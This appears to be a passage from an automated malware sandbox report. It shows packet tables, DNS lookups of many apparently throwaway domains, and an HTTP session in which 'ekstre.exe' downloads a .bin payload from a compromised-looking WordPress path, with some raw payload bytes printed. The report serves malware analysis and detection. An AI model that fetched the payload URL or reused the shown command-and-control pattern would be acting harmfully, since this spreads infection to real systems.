Mar 30, 2023 14:22:58.271279097 CEST	80	49815	212.32.237.91	192.168.11.20
Mar 30, 2023 14:22:58.283018112 CEST	80	49815	212.32.237.91	192.168.11.20
Mar 30, 2023 14:22:58.283096075 CEST	80	49815	212.32.237.91	192.168.11.20
Mar 30, 2023 14:22:58.283386946 CEST	49815	80	192.168.11.20	212.32.237.91
Mar 30, 2023 14:22:58.283452988 CEST	49815	80	192.168.11.20	212.32.237.91
Mar 30, 2023 14:22:58.299446106 CEST	80	49815	212.32.237.91	192.168.11.20
Mar 30, 2023 14:23:18.578668118 CEST	49817	80	192.168.11.20	213.186.33.5
Mar 30, 2023 14:23:18.598489046 CEST	80	49817	213.186.33.5	192.168.11.20
Mar 30, 2023 14:23:18.598817110 CEST	49817	80	192.168.11.20	213.186.33.5
Mar 30, 2023 14:23:18.598818064 CEST	49817	80	192.168.11.20	213.186.33.5
Mar 30, 2023 14:23:18.619414091 CEST	80	49817	213.186.33.5	192.168.11.20
Mar 30, 2023 14:23:18.619493008 CEST	80	49817	213.186.33.5	192.168.11.20
Mar 30, 2023 14:23:18.619882107 CEST	49817	80	192.168.11.20	213.186.33.5
Mar 30, 2023 14:23:18.619955063 CEST	49817	80	192.168.11.20	213.186.33.5
Mar 30, 2023 14:23:18.639631987 CEST	80	49817	213.186.33.5	192.168.11.20
Mar 30, 2023 14:24:00.008342981 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.176834106 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.177135944 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.177263021 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.346074104 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.680962086 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681011915 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681046963 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681197882 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681221008 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.681235075 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681354046 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681380987 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.681412935 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.681687117 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.681687117 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.688350916 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.688457012 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.688607931 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.688668966 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.721570969 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.721956015 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850120068 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850255966 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850341082 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850419044 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850467920 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850467920 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850487947 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850572109 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850641966 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850646973 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850646973 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850727081 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850796938 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850826979 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850826979 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850881100 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850950003 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.850999117 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.850999117 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.851026058 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.851066113 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.851088047 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.851146936 CEST	80	49819	199.33.123.34	192.168.11.20
Mar 30, 2023 14:24:00.851177931 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.851236105 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.851236105 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:00.851300955 CEST	49819	80	192.168.11.20	199.33.123.34
Mar 30, 2023 14:24:20.903942108 CEST	49821	80	192.168.11.20	45.132.157.81
Mar 30, 2023 14:24:21.106499910 CEST	80	49821	45.132.157.81	192.168.11.20
Mar 30, 2023 14:24:21.106818914 CEST	49821	80	192.168.11.20	45.132.157.81
Mar 30, 2023 14:24:21.106820107 CEST	49821	80	192.168.11.20	45.132.157.81
Mar 30, 2023 14:24:21.309381962 CEST	80	49821	45.132.157.81	192.168.11.20
Mar 30, 2023 14:24:21.311131954 CEST	80	49821	45.132.157.81	192.168.11.20
Mar 30, 2023 14:24:21.311242104 CEST	80	49821	45.132.157.81	192.168.11.20
Mar 30, 2023 14:24:21.311635971 CEST	49821	80	192.168.11.20	45.132.157.81
Mar 30, 2023 14:24:21.311753035 CEST	49821	80	192.168.11.20	45.132.157.81
Mar 30, 2023 14:24:21.514225006 CEST	80	49821	45.132.157.81	192.168.11.20
Mar 30, 2023 14:24:41.535023928 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.555672884 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:24:41.556049109 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.556050062 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.578622103 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:24:41.578732967 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:24:41.578810930 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:24:41.578886986 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:24:41.579080105 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.579081059 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.599704027 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:24:41.600145102 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.600145102 CEST	49823	80	192.168.11.20	62.149.128.45
Mar 30, 2023 14:24:41.620924950 CEST	80	49823	62.149.128.45	192.168.11.20
Mar 30, 2023 14:25:02.711811066 CEST	49829	80	192.168.11.20	67.21.93.229
Mar 30, 2023 14:25:02.879026890 CEST	80	49829	67.21.93.229	192.168.11.20
Mar 30, 2023 14:25:02.879311085 CEST	49829	80	192.168.11.20	67.21.93.229
Mar 30, 2023 14:25:02.879374027 CEST	49829	80	192.168.11.20	67.21.93.229
Mar 30, 2023 14:25:03.046586037 CEST	80	49829	67.21.93.229	192.168.11.20
Mar 30, 2023 14:25:03.046663046 CEST	80	49829	67.21.93.229	192.168.11.20
Mar 30, 2023 14:25:03.046678066 CEST	80	49829	67.21.93.229	192.168.11.20
Mar 30, 2023 14:25:03.046916008 CEST	49829	80	192.168.11.20	67.21.93.229
Mar 30, 2023 14:25:03.046962976 CEST	49829	80	192.168.11.20	67.21.93.229
Mar 30, 2023 14:25:03.214077950 CEST	80	49829	67.21.93.229	192.168.11.20
Mar 30, 2023 14:25:41.697058916 CEST	49835	80	192.168.11.20	142.250.186.51
Mar 30, 2023 14:25:41.708134890 CEST	80	49835	142.250.186.51	192.168.11.20
Mar 30, 2023 14:25:41.708327055 CEST	49835	80	192.168.11.20	142.250.186.51
Mar 30, 2023 14:25:41.708396912 CEST	49835	80	192.168.11.20	142.250.186.51
Mar 30, 2023 14:25:41.719655991 CEST	80	49835	142.250.186.51	192.168.11.20
Mar 30, 2023 14:25:41.826443911 CEST	80	49835	142.250.186.51	192.168.11.20
Mar 30, 2023 14:25:41.826522112 CEST	80	49835	142.250.186.51	192.168.11.20
Mar 30, 2023 14:25:41.826966047 CEST	49835	80	192.168.11.20	142.250.186.51
Mar 30, 2023 14:25:41.826967001 CEST	49835	80	192.168.11.20	142.250.186.51
Mar 30, 2023 14:25:41.840584993 CEST	80	49835	142.250.186.51	192.168.11.20
Mar 30, 2023 14:26:23.632770061 CEST	49839	80	192.168.11.20	198.54.117.212
Mar 30, 2023 14:26:23.799915075 CEST	80	49839	198.54.117.212	192.168.11.20
Mar 30, 2023 14:26:23.800182104 CEST	49839	80	192.168.11.20	198.54.117.212
Mar 30, 2023 14:26:23.800246000 CEST	49839	80	192.168.11.20	198.54.117.212
Mar 30, 2023 14:26:23.967269897 CEST	80	49839	198.54.117.212	192.168.11.20
Mar 30, 2023 14:26:23.967334986 CEST	80	49839	198.54.117.212	192.168.11.20
Mar 30, 2023 14:27:24.438997030 CEST	49844	80	192.168.11.20	66.29.145.79
Mar 30, 2023 14:27:24.608524084 CEST	80	49844	66.29.145.79	192.168.11.20
Mar 30, 2023 14:27:24.608937025 CEST	49844	80	192.168.11.20	66.29.145.79
Mar 30, 2023 14:27:24.608937025 CEST	49844	80	192.168.11.20	66.29.145.79
Mar 30, 2023 14:27:24.778868914 CEST	80	49844	66.29.145.79	192.168.11.20
Mar 30, 2023 14:27:24.850609064 CEST	80	49844	66.29.145.79	192.168.11.20
Mar 30, 2023 14:27:24.850689888 CEST	80	49844	66.29.145.79	192.168.11.20
Mar 30, 2023 14:27:24.851051092 CEST	49844	80	192.168.11.20	66.29.145.79
Mar 30, 2023 14:27:25.115900040 CEST	49844	80	192.168.11.20	66.29.145.79
Mar 30, 2023 14:27:25.284686089 CEST	80	49844	66.29.145.79	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2023 14:20:32.348100901 CEST	51329	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:20:33.118956089 CEST	53	51329	1.1.1.1	192.168.11.20
Mar 30, 2023 14:20:53.280445099 CEST	54081	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:20:53.352935076 CEST	53	54081	1.1.1.1	192.168.11.20
Mar 30, 2023 14:20:53.353359938 CEST	54081	53	192.168.11.20	9.9.9.9
Mar 30, 2023 14:20:53.923852921 CEST	53	54081	9.9.9.9	192.168.11.20
Mar 30, 2023 14:21:14.072493076 CEST	61772	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:21:14.094821930 CEST	53	61772	1.1.1.1	192.168.11.20
Mar 30, 2023 14:21:34.567982912 CEST	55766	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:21:34.589075089 CEST	53	55766	1.1.1.1	192.168.11.20
Mar 30, 2023 14:22:17.308381081 CEST	51359	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:22:17.358654976 CEST	53	51359	1.1.1.1	192.168.11.20
Mar 30, 2023 14:22:37.554008961 CEST	50410	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:22:37.704737902 CEST	53	50410	1.1.1.1	192.168.11.20
Mar 30, 2023 14:22:37.705137014 CEST	50410	53	192.168.11.20	9.9.9.9
Mar 30, 2023 14:22:37.809499025 CEST	53	50410	9.9.9.9	192.168.11.20
Mar 30, 2023 14:22:58.112375975 CEST	60631	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:22:58.238732100 CEST	53	60631	1.1.1.1	192.168.11.20
Mar 30, 2023 14:23:18.435600996 CEST	57573	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:23:18.577896118 CEST	53	57573	1.1.1.1	192.168.11.20
Mar 30, 2023 14:23:38.759331942 CEST	59709	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:23:39.156186104 CEST	53	59709	1.1.1.1	192.168.11.20
Mar 30, 2023 14:23:39.156631947 CEST	59709	53	192.168.11.20	9.9.9.9
Mar 30, 2023 14:23:39.819089890 CEST	53	59709	9.9.9.9	192.168.11.20
Mar 30, 2023 14:23:59.957993031 CEST	60337	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:24:00.007674932 CEST	53	60337	1.1.1.1	192.168.11.20
Mar 30, 2023 14:24:20.828320980 CEST	52506	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:24:20.903084040 CEST	53	52506	1.1.1.1	192.168.11.20
Mar 30, 2023 14:24:41.464409113 CEST	58091	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:24:41.534176111 CEST	53	58091	1.1.1.1	192.168.11.20
Mar 30, 2023 14:25:01.741240025 CEST	52820	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:25:02.710640907 CEST	53	52820	1.1.1.1	192.168.11.20
Mar 30, 2023 14:25:21.174412966 CEST	56639	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:25:21.588582039 CEST	53	56639	1.1.1.1	192.168.11.20
Mar 30, 2023 14:25:21.589040041 CEST	56639	53	192.168.11.20	9.9.9.9
Mar 30, 2023 14:25:22.595608950 CEST	56639	53	192.168.11.20	9.9.9.9
Mar 30, 2023 14:25:23.506546974 CEST	53	56639	9.9.9.9	192.168.11.20
Mar 30, 2023 14:25:24.037069082 CEST	53	56639	9.9.9.9	192.168.11.20
Mar 30, 2023 14:25:41.638607025 CEST	56074	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:25:41.696229935 CEST	53	56074	1.1.1.1	192.168.11.20
Mar 30, 2023 14:26:12.475672007 CEST	51270	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:26:13.366446972 CEST	53	51270	1.1.1.1	192.168.11.20
Mar 30, 2023 14:26:23.441859007 CEST	59992	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:26:23.631901979 CEST	53	59992	1.1.1.1	192.168.11.20
Mar 30, 2023 14:26:44.109349012 CEST	50762	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:26:44.121078014 CEST	53	50762	1.1.1.1	192.168.11.20
Mar 30, 2023 14:27:04.261152029 CEST	55799	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:27:04.273329020 CEST	53	55799	1.1.1.1	192.168.11.20
Mar 30, 2023 14:27:24.413136959 CEST	53587	53	192.168.11.20	1.1.1.1
Mar 30, 2023 14:27:24.438182116 CEST	53	53587	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 30, 2023 14:20:32.348100901 CEST	192.168.11.20	1.1.1.1	0xf3cc	Standard query (0)	www.leqidt.tax	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:20:53.280445099 CEST	192.168.11.20	1.1.1.1	0x6f85	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:20:53.353359938 CEST	192.168.11.20	9.9.9.9	0x6f85	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.072493076 CEST	192.168.11.20	1.1.1.1	0x86e8	Standard query (0)	www.crosswalkconsulting.co.uk	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:34.567982912 CEST	192.168.11.20	1.1.1.1	0x8de9	Standard query (0)	www.bestpetfinds.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:17.308381081 CEST	192.168.11.20	1.1.1.1	0xc582	Standard query (0)	www.credit-cards-54889.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:37.554008961 CEST	192.168.11.20	1.1.1.1	0x2ec7	Standard query (0)	www.doctorlinkscsk.link	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:37.705137014 CEST	192.168.11.20	9.9.9.9	0x2ec7	Standard query (0)	www.doctorlinkscsk.link	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:58.112375975 CEST	192.168.11.20	1.1.1.1	0xa888	Standard query (0)	www.realdigitalmarketing.co.uk	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:18.435600996 CEST	192.168.11.20	1.1.1.1	0x163e	Standard query (0)	www.laxmi.digital	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:38.759331942 CEST	192.168.11.20	1.1.1.1	0xcf22	Standard query (0)	www.kevinjasperinc.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:39.156631947 CEST	192.168.11.20	9.9.9.9	0xcf22	Standard query (0)	www.kevinjasperinc.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:59.957993031 CEST	192.168.11.20	1.1.1.1	0x98d2	Standard query (0)	www.hunterboots--canada.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:24:20.828320980 CEST	192.168.11.20	1.1.1.1	0xa83a	Standard query (0)	www.cursosweb22.online	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:24:41.464409113 CEST	192.168.11.20	1.1.1.1	0x9349	Standard query (0)	www.iltuosentiero.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:01.741240025 CEST	192.168.11.20	1.1.1.1	0x395c	Standard query (0)	www.6880365.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:21.174412966 CEST	192.168.11.20	1.1.1.1	0xc33f	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:21.589040041 CEST	192.168.11.20	9.9.9.9	0xc33f	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:22.595608950 CEST	192.168.11.20	9.9.9.9	0xc33f	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:41.638607025 CEST	192.168.11.20	1.1.1.1	0x5128	Standard query (0)	www.edelman-production.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:12.475672007 CEST	192.168.11.20	1.1.1.1	0x9228	Standard query (0)	www.3ay82.xyz	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.441859007 CEST	192.168.11.20	1.1.1.1	0xf46e	Standard query (0)	www.anotherworldrecord.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:44.109349012 CEST	192.168.11.20	1.1.1.1	0xe520	Standard query (0)	www.aux100000epices.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:27:04.261152029 CEST	192.168.11.20	1.1.1.1	0xbd8b	Standard query (0)	www.fluffyjet.online	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:27:24.413136959 CEST	192.168.11.20	1.1.1.1	0xc5fd	Standard query (0)	www.luivix.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 30, 2023 14:20:33.118956089 CEST	1.1.1.1	192.168.11.20	0xf3cc	Name error (3)	www.leqidt.tax	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:20:53.352935076 CEST	1.1.1.1	192.168.11.20	0x6f85	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:20:53.923852921 CEST	9.9.9.9	192.168.11.20	0x6f85	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	www.crosswalkconsulting.co.uk	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:14.094821930 CEST	1.1.1.1	192.168.11.20	0x86e8	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:21:34.589075089 CEST	1.1.1.1	192.168.11.20	0x8de9	No error (0)	www.bestpetfinds.com		112.196.98.174	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:17.358654976 CEST	1.1.1.1	192.168.11.20	0xc582	No error (0)	www.credit-cards-54889.com		185.53.179.91	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:37.704737902 CEST	1.1.1.1	192.168.11.20	0x2ec7	Server failure (2)	www.doctorlinkscsk.link	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:37.809499025 CEST	9.9.9.9	192.168.11.20	0x2ec7	Server failure (2)	www.doctorlinkscsk.link	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:22:58.238732100 CEST	1.1.1.1	192.168.11.20	0xa888	No error (0)	www.realdigitalmarketing.co.uk		212.32.237.91	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:18.577896118 CEST	1.1.1.1	192.168.11.20	0x163e	No error (0)	www.laxmi.digital		213.186.33.5	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:39.156186104 CEST	1.1.1.1	192.168.11.20	0xcf22	Server failure (2)	www.kevinjasperinc.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:23:39.819089890 CEST	9.9.9.9	192.168.11.20	0xcf22	Server failure (2)	www.kevinjasperinc.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:24:00.007674932 CEST	1.1.1.1	192.168.11.20	0x98d2	No error (0)	www.hunterboots--canada.com		199.33.123.34	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:24:20.903084040 CEST	1.1.1.1	192.168.11.20	0xa83a	No error (0)	www.cursosweb22.online	cursosweb22.online		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 14:24:20.903084040 CEST	1.1.1.1	192.168.11.20	0xa83a	No error (0)	cursosweb22.online		45.132.157.81	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:24:41.534176111 CEST	1.1.1.1	192.168.11.20	0x9349	No error (0)	www.iltuosentiero.com	iltuosentiero.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 14:24:41.534176111 CEST	1.1.1.1	192.168.11.20	0x9349	No error (0)	iltuosentiero.com		62.149.128.45	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:02.710640907 CEST	1.1.1.1	192.168.11.20	0x395c	No error (0)	www.6880365.com	num6.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 14:25:02.710640907 CEST	1.1.1.1	192.168.11.20	0x395c	No error (0)	num6.17986.net		67.21.93.229	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:21.588582039 CEST	1.1.1.1	192.168.11.20	0xc33f	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:23.506546974 CEST	9.9.9.9	192.168.11.20	0xc33f	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:24.037069082 CEST	9.9.9.9	192.168.11.20	0xc33f	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:25:41.696229935 CEST	1.1.1.1	192.168.11.20	0x5128	No error (0)	www.edelman-production.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 14:25:41.696229935 CEST	1.1.1.1	192.168.11.20	0x5128	No error (0)	ghs.googlehosted.com		142.250.186.51	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:13.366446972 CEST	1.1.1.1	192.168.11.20	0x9228	Name error (3)	www.3ay82.xyz	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	www.anotherworldrecord.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:23.631901979 CEST	1.1.1.1	192.168.11.20	0xf46e	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:26:44.121078014 CEST	1.1.1.1	192.168.11.20	0xe520	Name error (3)	www.aux100000epices.com	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:27:04.273329020 CEST	1.1.1.1	192.168.11.20	0xbd8b	Name error (3)	www.fluffyjet.online	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 14:27:24.438182116 CEST	1.1.1.1	192.168.11.20	0xc5fd	No error (0)	www.luivix.online		66.29.145.79	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

34.138.169.8

www.crosswalkconsulting.co.uk

www.bestpetfinds.com

www.credit-cards-54889.com

www.realdigitalmarketing.co.uk

www.laxmi.digital

www.hunterboots--canada.com

www.cursosweb22.online

www.iltuosentiero.com

www.6880365.com

www.edelman-production.com

www.anotherworldrecord.com

www.luivix.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49790	34.138.169.8	80	C:\Users\user\Desktop\ekstre.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:19:42.629466057 CEST	142	OUT	GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 34.138.169.8 Cache-Control: no-cache
Mar 30, 2023 14:19:42.770431042 CEST	144	IN	HTTP/1.1 200 OK Date: Thu, 30 Mar 2023 12:19:42 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1n Last-Modified: Tue, 21 Mar 2023 22:37:46 GMT ETag: "2e640-5f770b150a4e5" Accept-Ranges: bytes Content-Length: 190016 Content-Type: application/octet-stream Data Raw: ee c1 3a 56 68 91 54 04 6d 29 61 8f a0 97 9f 6f e2 1d 3c 3e f0 c1 f3 d6 08 75 33 de a3 b4 39 f2 60 3a ec 4c 90 62 3f e2 71 25 67 d1 d4 4a 07 fc 15 ac 43 da e3 00 7b 52 84 5a a4 39 ff a1 5f c8 c1 82 a6 c5 86 6a 11 9b 88 16 a2 d7 bd dc c6 13 ad 20 c0 98 ac 98 ea 0d eb 22 56 59 41 0b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e de 33 d1 36 42 13 28 49 2c 6e 80 b6 90 a1 9b cc 6a 23 a8 76 35 92 45 ae ab 31 34 b6 60 74 ca 46 58 59 4e a8 d4 8a 37 18 66 34 52 4f a5 35 e5 1f 